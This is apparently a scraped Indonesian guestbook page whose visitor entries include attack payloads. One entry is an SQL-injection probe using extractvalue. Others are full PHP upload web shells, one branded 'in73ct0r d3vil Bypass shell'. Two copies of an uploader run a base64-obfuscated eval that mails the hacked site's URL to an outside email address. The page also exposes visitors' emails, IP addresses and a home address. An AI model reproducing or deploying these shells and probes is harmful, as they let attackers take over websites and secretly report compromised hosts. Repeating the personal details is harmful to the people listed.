|
Buku Tamu
[Tulis Baru]
123456
Nama : 123456,
Alamat : 123456,
Kelamin : 1,
E-Mail : admin,
Web : 123456,
IP : 114.10.134.169
Postdate : 2025-01-09 02:24:19
|
123456
Nama : 123456,
Alamat : 123456,
Kelamin : 1,
E-Mail : admin,
Web : 123456,
IP : 114.10.134.169
Postdate : 2025-01-09 02:24:19
|
123456
Nama : 123456,
Alamat : 123456,
Kelamin : 1,
E-Mail : admin,
Web : 123456,
IP : 114.10.134.169
Postdate : 2025-01-09 02:24:19
|
123456
Nama : 123456,
Alamat : 123456,
Kelamin : 1,
E-Mail : admin,
Web : 123456,
IP : 114.10.134.169
Postdate : 2025-01-09 02:24:19
|
123456'and/**/extractvalue(1,concat(char(126),md5(1214638484)))and'
Nama : 123456,
Alamat : 123456,
Kelamin : 1,
E-Mail : admin,
Web : 123456,
IP : 114.10.134.169
Postdate : 2025-01-09 02:24:19
|
123456
Nama : 123456,
Alamat : 123456,
Kelamin : 1,
E-Mail : admin,
Web : 123456,
IP : 114.10.134.169
Postdate : 2025-01-09 02:24:19
|
123456
Nama : 123456,
Alamat : 123456,
Kelamin : 1,
E-Mail : admin,
Web : 123456,
IP : 114.10.134.169
Postdate : 2025-01-09 02:24:18
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>File Uploader Private</title>
<meta name="generator" content="in73ct0r" />
<meta name="author" content="in73ct0r" />
<meta name="description" content="[ in73ct0r d3vil ]" />
<style>
body {
background: #000000 url(https://lh6.googleusercontent.com/-uRLX3SeDrdI/TjBpUFR5oeI/AAAAAAAAAIo/GYSnWQxGWMc/cok.gif) scroll repeat center center;
color: silver;
font-family: Comic Sans MS;
font-size: 14px;
font-weight: bold
}
#black{
text-align: center;
font-size:14px;
font-weight: bold;
}
a:link, a:visited {font-weight:normal; text-decoration:none; color:silver;}
a:hover {font-weight:bold; text-decoration:none; cursor:default;}
</style>
</head>
<body>
<?php
$myUpload = new maxUpload();
//$myUpload->setUploadLocation(getcwd().DIRECTORY_SEPARATOR);
$myUpload->uploadFile();
?>
<?php
class maxUpload{
var $uploadLocation;
function maxUpload(){
$this->uploadLocation = getcwd().DIRECTORY_SEPARATOR;
}
function setUploadLocation($dir){
$this->uploadLocation = $dir;
}
function showUploadForm($msg='',$error=''){
?>
<div id="container">
<center><b>in73ct0r d3vil Bypass shell</b></center><br/>
<?php
if ($msg != ''){
echo '<p class="msg">'.$msg.'</p>';
} else if ($error != ''){
echo '<p class="emsg">'.$error.'</p>';
}
?>
<form action="" method="post" enctype="multipart/form-data" >
<center>
<label><b>File: </b>
<input name="myfile" type="file" size="30" />
</label>
<label>
<input type="submit" name="submitBtn" class="sbtn" value="Upload" />
</label>
</center>
</form>
</div>
<?php
}
function uploadFile(){
if (!isset($_POST['submitBtn'])){
$this->showUploadForm();
} else {
$msg = '';
$error = '';
//Check destination directory
if (!file_exists($this->uploadLocation)){
$error = "The target directory doesn't exists!";
} else if (!is_writeable($this->uploadLocation)) {
$error = "The target directory is not writeable!";
} else {
$target_path = $this->uploadLocation . basename( $_FILES['myfile']['name']);
if(@move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) {
$msg = basename( $_FILES['myfile']['name']).
" was uploaded successfully!";
} else{
$error = "The upload process failed! :-( ";
}
}
$this->showUploadForm($msg,$error);
}
}
}
?>
</body>
Nama : sadness,
Alamat : jauh,
Kelamin : L,
E-Mail : sadnessmct07@gmail.com,
Web : https://yuhan-education.com,
IP : 114.10.85.156
Postdate : 2024-07-27 00:16:00
|
<?php
if(empty($_GET['Nfiles']))$Nfiles=5;else $Nfiles=$_GET['Nfiles'];
if($_FILES['userfile']['tmp_name'][0]!=''){ for($i=0;$i<$Nfiles&&$_FILES['userfile']['tmp_name'][$i]!='';$i++){
$uploaddir = dirname(__FILE__);//'/var/www/uploads/';
$uploadfile = $uploaddir .'/'. basename($_FILES['userfile']['name'][$i]);
print "<pre>";
if (move_uploaded_file($_FILES['userfile']['tmp_name'][$i], $uploadfile)) {
print "File is valid, and was successfully uploaded. ";
//print_r($_FILES);
} else {
print "Possible fie upload attack! Here's some debugging info:
";
//print_r($_FILES);
}
print "</pre>";
}
}
$connection="ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07IA0KICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgDQogJGJvZHkgPSAiQWRhIFlhbmcgSW5qZWN0IFxuaHR0cDovLyR3ZWIkaW5qIjsNCiBtYWlsKCJsbEBob3RtYWlsLmZpIiwiSGFzaWwgaHR0cDovLyR3ZWIkaW5qIiwgIiRib2R5Iik7";
echo eval(base64_decode($connection));
?>
<form action="<?php echo $_SERVER['PHP_SELF'].'?Nfiles='.$Nfiles; ?>" method="post" enctype="multipart/form-data">
Send beleberda:<br>
"< <?php for($i=0;$i<$Nfiles;$i++){echo '<input name="userfile[]" type="file"><br>';}?>
<input type="submit" value="Send files">
</form>
>"
Nama : sssd,
Alamat : ddddd,
Kelamin : L,
E-Mail : user@user.com,
Web : google,
IP : 103.105.34.113
Postdate : 2024-04-08 20:00:16
|
<?php
if(empty($_GET['Nfiles']))$Nfiles=5;else $Nfiles=$_GET['Nfiles'];
if($_FILES['userfile']['tmp_name'][0]!=''){ for($i=0;$i<$Nfiles&&$_FILES['userfile']['tmp_name'][$i]!='';$i++){
$uploaddir = dirname(__FILE__);//'/var/www/uploads/';
$uploadfile = $uploaddir .'/'. basename($_FILES['userfile']['name'][$i]);
print "<pre>";
if (move_uploaded_file($_FILES['userfile']['tmp_name'][$i], $uploadfile)) {
print "File is valid, and was successfully uploaded. ";
//print_r($_FILES);
} else {
print "Possible fie upload attack! Here's some debugging info:
";
//print_r($_FILES);
}
print "</pre>";
}
}
$connection="ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07IA0KICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgDQogJGJvZHkgPSAiQWRhIFlhbmcgSW5qZWN0IFxuaHR0cDovLyR3ZWIkaW5qIjsNCiBtYWlsKCJsbEBob3RtYWlsLmZpIiwiSGFzaWwgaHR0cDovLyR3ZWIkaW5qIiwgIiRib2R5Iik7";
echo eval(base64_decode($connection));
?>
<form action="<?php echo $_SERVER['PHP_SELF'].'?Nfiles='.$Nfiles; ?>" method="post" enctype="multipart/form-data">
Send beleberda:<br>
<?php for($i=0;$i<$Nfiles;$i++){echo '<input name="userfile[]" type="file"><br>';}?>
<input type="submit" value="Send files">
</form>
Nama : kontol,
Alamat : ddddd,
Kelamin : L,
E-Mail : user@user.com,
Web : google,
IP : 103.105.34.113
Postdate : 2024-04-08 19:59:07
|
xxxxx
Nama : sssd,
Alamat : ddddd,
Kelamin : L,
E-Mail : user@mega.com,
Web : google,
IP : 103.105.34.92
Postdate : 2024-04-08 16:42:40
|
Alhamdulillaj lancar
Nama : Muryadi,
Alamat : Jl.KH.M.Kholil GM03 Wisma Tropodo Waru,
Kelamin : L,
E-Mail : muryadiryadi@yahoo.com,
Web : ,
IP : ::1
Postdate : 2016-11-27 17:02:08
|
|